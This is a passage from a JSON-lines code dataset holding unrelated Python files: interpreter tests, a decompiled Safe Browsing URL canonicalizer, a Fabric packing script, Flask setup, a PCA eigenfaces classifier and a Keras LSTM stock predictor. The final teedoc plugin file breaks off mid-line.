LOAD_CONSTANT_FLOAT, 0,\n RETURN, 0]),\n [], [12.2], [], [])\n frame = interpret(bc)\n assert frame.test_valuestack == [W_FloatObject(12.2)]\n assert frame.vars == []\n\n\ndef test_assignment():\n frame = interpret_source('x = 2.71;')\n assert frame.test_valuestack == []\n assert frame.vars == [W_FloatObject(2.71)]\n\n\ndef test_load_variable():\n frame = interpret_source('''\n x = 2.71;\n y = x;\n ''')\n assert frame.test_valuestack == []\n assert frame.names == ['x', 'y']\n assert frame.vars == [W_FloatObject(2.71), W_FloatObject(2.71)]\n\n\ndef test_dicard_top():\n frame = interpret_source('2.71;')\n assert frame.test_valuestack == []\n assert frame.vars == []\n\n\ndef test_jumps():\n bc = ByteCode(to_code([\n LOAD_CONSTANT_FLOAT, 0,\n JUMP_IF_FALSE, 8,\n LOAD_CONSTANT_FLOAT, 1,\n JUMP_ABSOLUTE, 10,\n LOAD_CONSTANT_FLOAT, 2,\n RETURN, 0]),\n [], [0.0, -1.0, 1.0], [], [])\n frame = interpret(bc)\n assert frame.test_valuestack == [W_FloatObject(1.0)]\n\n bc = ByteCode(to_code([\n LOAD_CONSTANT_FLOAT, 0,\n JUMP_IF_FALSE, 8,\n LOAD_CONSTANT_FLOAT, 1,\n JUMP_ABSOLUTE, 10,\n LOAD_CONSTANT_FLOAT, 2,\n RETURN, 0]),\n [], [1.0, -1.0, 2.0], [], [])\n frame 
= interpret(bc)\n assert frame.test_valuestack == [W_FloatObject(-1.0)]\n\n\ndef test_if():\n frame = interpret_source('''\n if (0) {\n x = 10;\n }''')\n assert frame.names == ['x']\n assert frame.vars == [None]\n assert frame.test_valuestack == []\n\n frame = interpret_source('''\n if (1) {\n x = 10;\n }''')\n assert frame.names == ['x']\n assert frame.vars == [W_FloatObject(10.0)]\n assert frame.test_valuestack == []\n\n\ndef test_while():\n frame = interpret_source('''\n while (0) {\n x = 10;\n }''')\n assert frame.names == ['x']\n assert frame.vars == [None]\n assert frame.test_valuestack == []\n\n frame = interpret_source('''\n x = 1;\n y = 10;\n while (x) {\n x = 0;\n y = 100;\n }''')\n assert frame.names == ['x', 'y']\n assert frame.vars == [W_FloatObject(0.0), W_FloatObject(100.0)]\n assert frame.test_valuestack == []\n\n\ndef test_binary_add():\n frame = interpret_source('''\n x = 1 + 2.5;\n ''')\n assert frame.names == ['x']\n assert frame.vars == [W_FloatObject(3.5)]\n assert frame.test_valuestack == []\n\n\ndef test_binary_bool():\n for binary_op, check_fn in [\n ('<', lambda x, y: x < y),\n ('==', lambda x, y: x == y),\n ]:\n for x, y in [(1.0, 2.5), (1.0, 1.0), (1.0, 1.1)]:\n frame = interpret_source('''\n x = %s;\n y = %s;\n res = x %s y;\n ''' % (x, y, binary_op))\n assert frame.names == ['x', 'y', 'res']\n assert frame.vars == [\n W_FloatObject(x), W_FloatObject(y),\n W_BoolObject(check_fn(x, y))]\n assert frame.test_valuestack == []\n\n\ndef test_while_loops():\n frame = interpret_source('''\n x = 0;\n while (x < 10) {\n x = x + 1;\n }\n ''')\n assert frame.names == ['x']\n assert frame.vars == [W_FloatObject(10.0)]\n assert frame.test_valuestack == []\n\n\ndef test_print(capfd):\n frame = interpret_source('print(3.78);')\n out, _ = capfd.readouterr()\n assert out == '3.78\\n'\n assert frame.test_valuestack == []\n\n\ndef test_arithmetic_expressions():\n frame = interpret_source('''\n x = 10;\n y = 4 + x * 2;\n z = (x + y) / x + 3;\n foo = y % 5 + y % 1 + y % 2;\n ''')\n x = 10.0\n y = 4 + x * 2\n z = (x + y) / x + 3\n foo = y % 5 + y % 1 + y % 2\n assert frame.names == ['x', 'y', 'z', 'foo']\n assert frame.vars == map(W_FloatObject, [x, y, z, foo])\n assert frame.test_valuestack == []\n\n\ndef test_fn_noop():\n frame = interpret_source('''\n function foo() {};\n foo();\n ''')\n assert frame.names == ['foo']\n assert len(frame.vars) == 1\n assert frame.test_valuestack == []\n\n\ndef test_fn_print(capfd):\n frame = interpret_source('''\n function foo() {\n print(1);\n };\n foo();\n ''')\n out, _ = capfd.readouterr()\n assert out == '1.0\\n'\n assert frame.names == ['foo']\n assert len(frame.vars) == 1\n assert frame.test_valuestack == []\n\n\ndef test_fn_args(capfd):\n frame = interpret_source('''\n function foo(x) {\n print(x);\n };\n foo(10);\n ''')\n out, _ = capfd.readouterr()\n assert out == '10.0\\n'\n assert frame.names == ['foo']\n assert len(frame.vars) == 1\n assert frame.test_valuestack == []\n\n frame = interpret_source('''\n function foo(x, y) {\n print(x + y);\n };\n x = 20;\n foo(10, x);\n ''')\n out, _ = capfd.readouterr()\n assert out == '30.0\\n'\n assert frame.names == ['foo', 'x']\n assert len(frame.vars) == 2\n assert frame.test_valuestack == []\n\n\ndef test_return():\n frame = interpret_source('''\n function const() {\n return 3.14;\n };\n z = const();\n ''')\n assert frame.names == ['const', 'z']\n assert frame.vars[1] == W_FloatObject(3.14)\n\n frame = interpret_source('''\n function two(x) {\n return x * 2;\n };\n z = two(two(11));\n ''')\n assert 
frame.names == ['two', 'z']\n assert frame.vars[1] == W_FloatObject(44)\n\n\ndef test_scope():\n frame = interpret_source('''\n x = 10;\n function s() {\n return x;\n };\n y = s();\n ''')\n assert frame.names == ['x', 's', 'y']\n assert frame.vars[2] == W_FloatObject(10.0)\n\n frame = interpret_source('''\n g = 30;\n function s() {\n g = 10;\n function inner() {\n return g;\n };\n return inner;\n };\n function scoped() {\n g = 20;\n inner = s();\n return inner();\n };\n\n y = scoped();\n ''')\n assert frame.names == ['g', 's', 'scoped', 'y']\n assert frame.vars[3] == W_FloatObject(10.0)\n\n\ndef test_recursion():\n frame = interpret_source('''\n function fib(x) {\n if (x < 3) {\n return 1;\n } else {\n return fib(x - 1) + fib(x - 2);\n }\n };\n f1 = fib(1);\n f2 = fib(2);\n f3 = fib(3);\n f4 = fib(4);\n f10 = fib(10);\n ''')\n assert frame.names == ['fib', 'f1', 'f2', 'f3', 'f4', 'f10']\n assert frame.vars[1] == W_FloatObject(1.0)\n assert frame.vars[2] == W_FloatObject(1.0)\n assert frame.vars[3] == W_FloatObject(2.0)\n assert frame.vars[4] == W_FloatObject(3.0)\n assert frame.vars[5] == W_FloatObject(55.0)\n","sub_path":"tests/test_interpreter.py","file_name":"test_interpreter.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"141154801","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/googlesafebrowsing/expression.py\n# Compiled at: 2010-12-12 06:18:52\n\"\"\"Helper classes which help converting a url to a list of SB expressions.\"\"\"\nimport array, logging, re, string, urllib, urlparse, util\n\nclass UrlParseError(Exception):\n pass\n\n\ndef GenerateSafeChars():\n \"\"\"\n Return a string containing all 'safe' characters that shouldn't be escaped\n for url encoding. This includes all printable characters except '#%' and\n whitespace characters.\n \"\"\"\n unfiltered_chars = string.digits + string.ascii_letters + string.punctuation\n filtered_list = [ c for c in unfiltered_chars if c not in '%#' ]\n return array.array('c', filtered_list).tostring()\n\n\nclass ExpressionGenerator(object):\n \"\"\"Class does the conversion url -> list of SafeBrowsing expressions.\n\n This class converts a given url into the list of all SafeBrowsing host-suffix,\n path-prefix expressions for that url. These are expressions that are on the\n SafeBrowsing lists.\n \"\"\"\n HEX = re.compile('^0x([a-fA-F0-9]+)$')\n OCT = re.compile('^0([0-7]+)$')\n DEC = re.compile('^(\\\\d+)$')\n IP_WITH_TRAILING_SPACE = re.compile('^(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}) ')\n POSSIBLE_IP = re.compile('^(?i)((?:0x[0-9a-f]+|[0-9\\\\\\\\.])+)$')\n FIND_BAD_OCTAL_REGEXP = re.compile('(^|\\\\.)0\\\\d*[89]')\n HOST_PORT_REGEXP = re.compile('^(?:.*@)?(?P[^:]*)(:(?P\\\\d+))?$')\n SAFE_CHARS = GenerateSafeChars()\n DEFAULT_PORTS = {'http': '80', 'https': '443', 'ftp': '21'}\n\n def __init__(self, url):\n parse_exception = UrlParseError('failed to parse URL \"%s\"' % (url,))\n canonical_url = ExpressionGenerator.CanonicalizeUrl(url)\n if not canonical_url:\n raise parse_exception\n self._host_lists = []\n self._path_exprs = []\n url_split = urlparse.urlsplit(canonical_url)\n canonical_host, canonical_path = url_split[1], url_split[2]\n self._MakeHostLists(canonical_host, parse_exception)\n if url_split[3]:\n self._path_exprs.append(canonical_path + '?' 
+ url_split[3])\n self._path_exprs.append(canonical_path)\n path_parts = canonical_path.rstrip('/').lstrip('/').split('/')[:3]\n if canonical_path.count('/') < 4:\n path_parts.pop()\n while path_parts:\n self._path_exprs.append('/' + ('/').join(path_parts) + '/')\n path_parts.pop()\n\n if canonical_path != '/':\n self._path_exprs.append('/')\n\n @staticmethod\n def CanonicalizeUrl(url):\n \"\"\"Canonicalize the given URL for the SafeBrowsing protocol.\n\n Args:\n url: URL to canonicalize.\n Returns:\n A canonical URL or None if the URL could not be canonicalized.\n \"\"\"\n tmp_pos = url.find('#')\n if tmp_pos >= 0:\n url = url[0:tmp_pos]\n url = url.lstrip().rstrip()\n url = url.replace('\\t', '').replace('\\r', '').replace('\\n', '')\n url = ExpressionGenerator._Escape(url)\n url_split = urlparse.urlsplit(url)\n if not url_split[0]:\n url = 'http://' + url\n url_split = urlparse.urlsplit(url)\n url_scheme = url_split[0].lower()\n if url_scheme not in ExpressionGenerator.DEFAULT_PORTS:\n return None\n else:\n m = ExpressionGenerator.HOST_PORT_REGEXP.match(url_split[1])\n if not m:\n return None\n host, port = m.group('host'), m.group('port')\n canonical_host = ExpressionGenerator.CanonicalizeHost(host)\n if not canonical_host:\n return None\n if port and port != ExpressionGenerator.DEFAULT_PORTS[url_scheme]:\n canonical_host += ':' + port\n canonical_path = ExpressionGenerator.CanonicalizePath(url_split[2])\n canonical_url = url_split[0] + '://' + canonical_host + canonical_path\n if url_split[3] != '' or url.endswith('?'):\n canonical_url += '?' + url_split[3]\n return canonical_url\n\n @staticmethod\n def CanonicalizePath(path):\n \"\"\"Canonicalize the given path.\"\"\"\n if not path:\n return '/'\n if path[0] != '/':\n path = '/' + path\n path = ExpressionGenerator._Escape(path)\n path_components = []\n for path_component in path.split('/'):\n if path_component == '..':\n if len(path_components) > 0:\n path_components.pop()\n elif path_component != '.' and path_component != '':\n path_components.append(path_component)\n\n canonical_path = '/' + ('/').join(path_components)\n if path.endswith('/') and not canonical_path.endswith('/'):\n canonical_path += '/'\n return canonical_path\n\n @staticmethod\n def CanonicalizeHost(host):\n \"\"\"Canonicalize the given host. 
Returns None in case of an error.\"\"\"\n if not host:\n return None\n else:\n host = ExpressionGenerator._Escape(host.lower())\n ip = ExpressionGenerator.CanonicalizeIp(host)\n if ip:\n host = ip\n else:\n host_split = [ part for part in host.split('.') if part ]\n if len(host_split) < 2:\n return None\n host = ('.').join(host_split)\n return host\n\n @staticmethod\n def CanonicalizeIp(host):\n \"\"\"\n Return a canonicalized IP if host can represent an IP and None otherwise.\n \"\"\"\n if len(host) <= 15:\n m = ExpressionGenerator.IP_WITH_TRAILING_SPACE.match(host)\n if m:\n host = m.group(1)\n if not ExpressionGenerator.POSSIBLE_IP.match(host):\n return\n else:\n allow_octal = not ExpressionGenerator.FIND_BAD_OCTAL_REGEXP.search(host)\n host_split = [ part for part in host.split('.') if part ]\n if len(host_split) > 4:\n return\n ip = []\n for i in xrange(len(host_split)):\n m = ExpressionGenerator.HEX.match(host_split[i])\n if m:\n base = 16\n else:\n m = ExpressionGenerator.OCT.match(host_split[i])\n if m and allow_octal:\n base = 8\n else:\n m = ExpressionGenerator.DEC.match(host_split[i])\n if m:\n base = 10\n else:\n return\n n = long(m.group(1), base)\n if n > 255:\n if i < len(host_split) - 1:\n n &= 255\n ip.append(n)\n else:\n bytes = []\n shift = 0\n while n > 0 and len(bytes) < 4:\n bytes.append(n & 255)\n n >>= 8\n\n if len(ip) + len(bytes) > 4:\n return\n bytes.reverse()\n ip.extend(bytes)\n else:\n ip.append(n)\n\n while len(ip) < 4:\n ip.append(0)\n\n return '%u.%u.%u.%u' % tuple(ip)\n\n def Expressions(self):\n \"\"\"\n A generator of the possible expressions.\n \"\"\"\n for host_parts in self._host_lists:\n host = ('.').join(host_parts)\n for p in self._path_exprs:\n yield Expression(host, p)\n\n @staticmethod\n def _Escape(unescaped_str):\n \"\"\"Fully unescape the given string, then re-escape once.\n\n Args:\n unescaped_str: string that should be escaped.\n Returns:\n Escaped string according to the SafeBrowsing protocol.\n \"\"\"\n unquoted = urllib.unquote(unescaped_str)\n while unquoted != unescaped_str:\n unescaped_str = unquoted\n unquoted = urllib.unquote(unquoted)\n\n return urllib.quote(unquoted, ExpressionGenerator.SAFE_CHARS)\n\n def _MakeHostLists(self, host, parse_exception):\n \"\"\"\n Canonicalize host and build self._host_lists.\n \"\"\"\n ip = ExpressionGenerator.CanonicalizeIp(host)\n if ip is not None:\n self._host_lists.append([ip])\n return\n else:\n host_split = [ part for part in host.split('.') if part ]\n if len(host_split) < 2:\n raise parse_exception\n start = len(host_split) - 5\n stop = len(host_split) - 1\n if start <= 0:\n start = 1\n self._host_lists.append(host_split)\n for i in xrange(start, stop):\n self._host_lists.append(host_split[i:])\n\n return\n\n\nclass Expression(object):\n \"\"\"Class which represents a host-suffix, path-prefix expression.\"\"\"\n\n def __init__(self, host, path):\n self._host = host\n self._path = path\n self._value = host + path\n self._hash_value = util.GetHash256(self._value)\n\n def __str__(self):\n return self.Value()\n\n def __repr__(self):\n \"\"\"\n Not really a good repr. 
This is for debugging.\n        \"\"\"\n        return self.Value()\n\n    def Value(self):\n        return self._value\n\n    def HashValue(self):\n        return self._hash_value","sub_path":"pycfiles/googlesafebrowsing-0.2.beta.git-py2.6/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":9513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"480423432","text":"#!/usr/bin/python3\nfrom datetime import datetime\nfrom fabric.api import local\n\n\ndef do_pack():\n    \"\"\" Compress files fabric \"\"\"\n    d = datetime.now()\n    file = \"web_static_{}.tgz\".format(str(d.year) + str(\n        d.month) + str(d.day) + str(d.hour) + str(d.minute) + str(d.second))\n    try:\n        local(\"mkdir -p versions\")\n        local(\"tar -cvzf versions/{} web_static/\".format(file))\n        return \"versions/{}\".format(file)\n    except Exception:\n        return None\n","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497226886","text":"import os\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom scipy.io import loadmat\nfrom sklearn.decomposition import PCA\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import accuracy_score\n\n\ndef test(data, eigenvectors, mean, train_descriptors, train_labels, test_labels):\n\t\"\"\"\n\tProjects the given faces onto the subspace defined by eigenvectors and classifies them\n\tvia nearest neighbor approach against the given descriptors.\n\n\tArgs:\n\t\tdata: the face data to classify.\n\t\teigenvectors: the eigenvectors spanning the face subspace.\n\t\tmean: the mean face of the training data.\n\t\ttrain_descriptors: the descriptors for the training set faces.\n\t\ttrain_labels: the labels for the training data.\n\t\ttest_labels: the labels for the test data.\n\n\tReturns:\n\t\tClassification accuracy, describing how many test faces have been\n\t\tlabeled as the right person.\n\t\"\"\"\n\ttest_descriptors = np.dot(data - mean, eigenvectors.T)\n\n\tnn = NearestNeighbors(n_neighbors=1).fit(train_descriptors)\n\tdistances, indices = nn.kneighbors(test_descriptors)\n\tpredicted_labels = train_labels[indices].flatten()\n\n\treturn accuracy_score(test_labels, predicted_labels)\n\ndef load_data(path):\n\t\"\"\"\n\tLoads the face data from the provided file.\n\n\tArgs:\n\t\tpath: the path to the .mat file.\n\n\tReturns:\n\t\tdata: The image data.\n\t\tlabels: The labels for the images.\n\t\"\"\"\n\tif not os.path.isfile(path):\n\t\traise IOError(\"Argument is not a file\")\n\telse:\n\t\tmat = loadmat(path)\n\t\tdata = mat[\"fea\"]\n\t\tlabels = mat[\"gnd\"]\n\t\treturn data, labels\n\ndef load_spec(path):\n\t\"\"\"\n\tLoads the train/test specification from the provided file.\n\tThis file indicates which images from the dataset are used\n\tfor training and for testing.\n\n\tArgs:\n\t\tpath: the path to the .mat file.\n\n\tReturns:\n\t\tA dictionary containing the specification.\n\t\"\"\"\n\tif not os.path.isfile(path):\n\t\traise IOError(\"Argument is not a file\")\n\telse:\n\t\tmat = loadmat(path)\n\t\treturn mat\n\ndef pca(data, k, use_sklearn=False):\n\t\"\"\"\n\tApplies principal component analysis to the given data, calculating the\n\tfirst k principal components.\n\n\tArgs:\n\t\tdata: the data to calculate the principal components for\n\t\t(in the format observation x feature vector).\n\t\tk: the number of principal components to calculate.\n\t\tuse_sklearn: a flag to indicate whether sklearn should be used 
to do\n\t\tthe PCA (for comparison with the own implementation)\n\n\tReturns:\n\t\tdescriptors: the projection of the data onto the new subspace.\n\t\teigenvectors: the eigenvectors corresponding to the k highest eigenvalues.\n\t\tmean: the mean of the data.\n\t\"\"\"\n\tmean = np.mean(data, axis=0)\n\tX = data - mean\n\n\tif use_sklearn:\n\t\tpca = PCA(n_components=k)\n\t\tpca.fit(X)\n\t\teigenvectors = pca.components_\n\t\tdescriptors = pca.transform(X)\n\telse:\n\t\t[n, d] = X.shape\n\t\t\n\t\tif n > d:\n\t\t\tC = np.dot(X.T, X)\n\t\t\t[eigenvalues, eigenvectors] = np.linalg.eigh(C)\n\t\telse:\n\t\t\tC = np.dot(X, X.T)\n\t\t\t[eigenvalues, eigenvectors] = np.linalg.eigh(C)\n\t\t\teigenvectors = np.dot(X.T, eigenvectors).T\n\t\t\tfor i in range(n):\n\t\t\t\t# normalize\n\t\t\t\teigenvectors[i] = eigenvectors[i]/np.linalg.norm(eigenvectors[i])\n\n\t\tidx = np.argsort(-eigenvalues)\n\t\teigenvalues = eigenvalues[idx]\n\t\teigenvectors = eigenvectors[idx]\n\n\t\t# keep only k\n\t\teigenvalues = eigenvalues[:k]\n\t\teigenvectors = eigenvectors[:k]\n\n\t\tdescriptors = np.dot(X, eigenvectors.T)\n\n\treturn descriptors, eigenvectors, mean\n\ndef reconstruct(mean, eigenvectors, descriptor):\n\t\"\"\"\n\tReconstructs the image of a face from the mean face, the eigenvectors\n\tand the image's descriptors.\n\n\tArgs:\n\t\tmean: the mean face.\n\t\teigenvectors: the eigenvectors of the face subspace.\n\t\tdescriptor: the target face's descriptor.\n\n\tReturns:\n\t\tThe reconstructed face image as a row vector.\n\t\"\"\"\n\treturn mean + np.dot(eigenvectors.T, descriptor)\n\ndef plot_reconstruction(mean, eigenvectors, descriptor, rows, columns):\n\t\"\"\"\n\tPlots the reconstruction of a face with varying numbers of eigenfaces.\n\n\tArgs:\n\t\tmean: the mean face.\n\t\teigenvectors: the eigenvectors of the face subspace.\n\t\tdescriptor: the target face's descriptor.\n\t\trows: number of rows in the plot.\n\t\tcolumns: number of columns in the plot.\n\t\"\"\"\n\treconstructions = []\n\ttitles = []\n\n\tfor i in range(10, min(len(eigenvectors), 320), 20):\n\t reconstructions.append(reconstruct(mean, eigenvectors[:i], descriptor[:i]).reshape(32, 32))\n\t titles.append(\"{} eigenfaces\".format(i))\n\n\tplot_faces(reconstructions, rows, columns, titles)\n\n\ndef plot_faces(faces, rows, columns, sptitle=None):\n\t\"\"\"\n\tPlots the given image data in rows x columns subplots.\n\n\tArgs:\n\t\tfaces: the face data.\n\t\trows: number of rows in the plot.\n\t\tcolumns: number of columns in the plot.\n\t\tsptitle: titles for the subplots.\n\t\"\"\"\n\tfig = plt.figure()\n\t\n\tfor i, face in enumerate(faces):\n\t\tax = fig.add_subplot(rows, columns, i+1)\n\t\tax.axis(\"off\")\n\t\tax.imshow(np.rot90(face, k=3), cmap=cm.gray)\n\n\t\tif sptitle != None:\n\t\t\tif len(sptitle) == len(faces):\n\t\t\t\tplt.title(sptitle[i], fontname=\"Tahoma\", fontsize=10)\n\t\t\telse:\n\t\t\t\tplt.title(\"{} #{}\".format(sptitle, i), fontname=\"Tahoma\", fontsize=10)\n\tfig.show()\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument(\"--datafile\", default=\"faces/ORL_32x32.mat\", help=\"file with face data\")\n\tparser.add_argument(\"--specfile\", default=\"faces/5Train/5.mat\", help=\"matrix specifying which images to use for training and testing\")\n\tparser.add_argument(\"--k\", help=\"number of principal components to use\", type=int, default=None)\n\tparser.add_argument(\"--use_sklearn\", help=\"\", action=\"store_true\")\n\targs 
= parser.parse_args()\n\n\tdata, labels = load_data(args.datafile)\n\n\t# Normalize data\n\tdata = np.array(data/255.0)\n\n\tspec = load_spec(args.specfile)\n\n\t# Need to subtract 1 from the indices, because matrices\n\t# have originally been created in MATLAB and\n\t# MATLAB indexing starts at 1 as opposed to 0\n\ttrain_data = data[spec[\"trainIdx\"].flatten()-1]\n\ttrain_labels = labels[spec[\"trainIdx\"].flatten()-1].flatten()\n\ttest_data = data[spec[\"testIdx\"].flatten()-1]\n\ttest_labels = labels[spec[\"testIdx\"].flatten()-1].flatten()\n\n\tif args.k != None:\n\t\tif args.k > len(train_data):\n\t\t\tprint(\"Warning: specified more principal components than there are images in the training set. \" +\n\t\t\t\t\"Using {} principal components instead.\".format(len(train_data)))\n\t\t\targs.k = len(train_data)\n\n\t\ttrain_descriptors, eigenvectors, mean = pca(train_data, args.k, args.use_sklearn)\n\t\teigenfaces = eigenvectors.reshape(args.k, 32, 32)\n\t\t\n\t\tscore = test(test_data, eigenvectors, mean, train_descriptors, train_labels, test_labels)\n\t\tprint(\"Accuracy: {}\".format(score))\n\telse:\n\t\t# If no k is specified, calculate accuracies for all possible values of k and\n\t\t# return scores array to global scope\n\t\tscores = []\n\t\tfor k in range(1, len(train_data)+1):\n\t\t\ttrain_descriptors, eigenvectors, mean = pca(train_data, k, args.use_sklearn)\n\t\t\teigenfaces = eigenvectors.reshape(k, 32, 32)\n\t\t\t\n\t\t\tscore = test(test_data, eigenvectors, mean, train_descriptors, train_labels, test_labels)\n\t\t\tscores.append(score)\n","sub_path":"eigenfaces/eigenface.py","file_name":"eigenface.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"95169352","text":"import pandas as pd\nimport numpy as np\n\nfrom random import randint\nfrom keras.layers import TimeDistributed, Activation\nfrom numpy.random import choice\nfrom keras import metrics\nimport tensorflow as tf\nimport keras\nfrom keras import backend as K\nfrom keras.utils.data_utils import get_file\nfrom keras.utils import np_utils\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, Embedding, Reshape, merge, LSTM, Bidirectional\nfrom keras.layers import TimeDistributed, Activation, SimpleRNN, GRU\nfrom keras.layers.core import Flatten, Dense, Dropout, Lambda\n#from keras.regularizers import l2, activity_l2, l1, activity_l1\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import SGD, RMSprop, Adam\n#from keras.utils.layer_utils import layer_from_config\nfrom keras.metrics import categorical_crossentropy, categorical_accuracy\nfrom keras.layers.convolutional import *\nfrom keras.preprocessing import image, sequence\nfrom keras.preprocessing.text import Tokenizer\n\ndef get_data(sheetname):\n f = pd.read_excel(open('Base.xlsx','rb'), sheetname=sheetname)\n f[\"Date\"] = pd.to_datetime(f[\"Date\"], format='%d/%m/%Y')\n# tmp = (np.array(f[\"SPX Index\"][20:])/np.array(f[\"SPX Index\"][:-20])-1)*100\n# f[\"20days\"] = np.concatenate((tmp,np.zeros(20)))\n# f[\"20days\"][f[\"20days\"]<-9] = -9\n# f[\"20days\"][f[\"20days\"]>11] = 11\n# f[\"SPX Index\"][1:] = variation_change(f[\"SPX Index\"])\n# f[\"VIX Index\"] = f[\"VIX Index\"].round(0)\n# f[\"ES1 Index\"][1:] = variation_change(f[\"ES1 Index\"])\n# f[\"ES1 Volume\"][1:] = variation_change(f[\"ES1 Volume\"])\n# f = f[1:]\n f = f.set_index('Date')\n return 
f.round(3)\n\ndef variation_change(df):\n return (np.array(df[1:])/np.array(df[:-1])-1)*100\n\n\ndef onehot(x, time_step, vocab_size): \n b = np.zeros((len(x),len(x[1]), vocab_size))\n for i in range(len(x)) :\n b[i] = onehotint(x[i],len(x[1]),vocab_size)\n return(np.array(b))\n\ndef onehotint(x, length, vocab_size):\n c = np.zeros((length, vocab_size))\n c[np.arange(length), x] = 1 \n return c\n\ndef inverse_onehotint(x, vocab_size):\n return (np.matmul(x,np.arange(vocab_size))-50)\n\n\ndef build_pnl_sentences(x, stock, time_step, length, vocab_size):\n# char_indices, indices_char, idx = build_dictionary(x)\n sentences = []\n next_chars = []\n for i in range(0, length):\n sentences.append(pnl(x[stock][i: i + time_step].values)+50)\n next_chars.append((pnl(x[stock][i: i+time_step+20].values)+50)[20: time_step+20])\n print('nb sequences:', len(sentences))\n sentences = onehot(sentences,time_step,vocab_size)\n next_chars = onehot(next_chars,time_step,vocab_size)\n\n return sentences, next_chars\n\ndef build_complete_sentences(x, stock, time_step, length, vocab_size):\n# char_indices, indices_char, idx = build_dictionary(x)\n sentences = []\n\n for i in range(0, length):\n sentences.append(pnl(x[stock][i: i + time_step].values)+50)\n\n print('nb sequences:', len(sentences))\n sentences = onehot(sentences,time_step,vocab_size)\n\n return sentences\n\ndef pnl(x):\n# return ((x/x[0])*100-100).astype(int)\n return ((x/x[0]-1)*100).astype(int)\n\ndef augment_size_of_sample(sentences):\n z = np.zeros((sentences.shape))\n for x in range(len(sentences)):\n for y in range(len(sentences[0])):\n z[x,y] = np.roll(sentences[x,y],randint(a=-1,b=1))\n\n return z\n\ndef Build_Model(stock, shape):\n \n model2=Sequential([\n # Conv1D(10, input_shape=(10,60), return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n # consume_less='gpu'),\n # Dropout(0.2),\n LSTM(90,input_shape=shape, return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n consume_less='gpu'),\n Dropout(0.2),\n LSTM(90, return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n consume_less='gpu'),\n Dropout(0.2),\n LSTM(90, return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n consume_less='gpu'),\n Dropout(0.2),\n TimeDistributed(Dense(shape[-1], activation='softmax' ) ),\n ])\n\n model2.compile(loss='categorical_crossentropy', optimizer=Adam(), \n metrics=[metrics.mae, metrics.categorical_accuracy])\n model2.summary()\n \n return model2\n\ndef Train_Model(stock, model2, x, y):\n for i in range(5):\n model2.fit(augment_size_of_sample(x), \n y,\n batch_size=64,\n epochs=4,\n shuffle=True,\n validation_split=0.2)\n model2.save_weights('char_lstm_hope_advance_'+stock+'.h5')\n return model2\n\ndef export_excel(stock, model2, df, sentences_pnl, STARTING_POINT, n ):\n rows=[]\n columns_name = [\"Date\",\"Price\",\"Prediction_price_in_20_days\",\"Reel_price_in_20_days\"]\n for i0 in range(n):\n row = []\n X_val = sentences_pnl[STARTING_POINT+i0:STARTING_POINT+i0+1]\n run = model2.predict( X_val)[0][-1]\n row+=[df[stock].index[STARTING_POINT+i0+59]]\n row+=[df[stock][STARTING_POINT+i0+59]]\n row+=[(np.argmax(run)-50+100)*df[stock][STARTING_POINT+i0]/100]\n if (STARTING_POINT+i0+79)>df.shape[0]-1:\n row+=[\"???\"]\n else :\n row+=[df[stock][STARTING_POINT+i0+79]]\n rows+=[row]\n dg = pd.DataFrame(columns=columns_name, data=rows)\n writer = pd.ExcelWriter('output_'+stock+'.xlsx')\n dg.to_excel(writer,stock)\n writer.save()\n 
return(\"Done\")","sub_path":"123/THEAM_DEEP_LEARNING.py","file_name":"THEAM_DEEP_LEARNING.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"636335465","text":"from flask_debugtoolbar import DebugToolbarExtension\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\ndebug_toolbar = DebugToolbarExtension()\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\n\n\ndef init_app(app):\n debug_toolbar.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n","sub_path":"openpot/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"582158533","text":" # UPPER AND LOWER MATHOD\n\nname = 'hello world'\n\nname = name.upper() # this is used to upper case all the letter in the variable\n\nprint(name)\n\nname1 = 'NONE'\n\nname1 = name1.lower() # this will lower case all the characters in variable\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"manipulating string/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"36164331","text":"from genericpath import exists\nimport os, sys\nfrom os.path import join\nimport tempfile\nimport shutil\nimport markdown2\nimport json\ntry:\n curr_path = os.path.dirname(os.path.abspath(__file__))\n teedoc_project_path = os.path.abspath(os.path.join(curr_path, \"..\", \"..\", \"..\"))\n if os.path.basename(teedoc_project_path) == \"teedoc\":\n sys.path.insert(0, teedoc_project_path)\nexcept Exception:\n pass\nfrom teedoc import Plugin_Base\nfrom teedoc import Fake_Logger\n\n\n\nclass 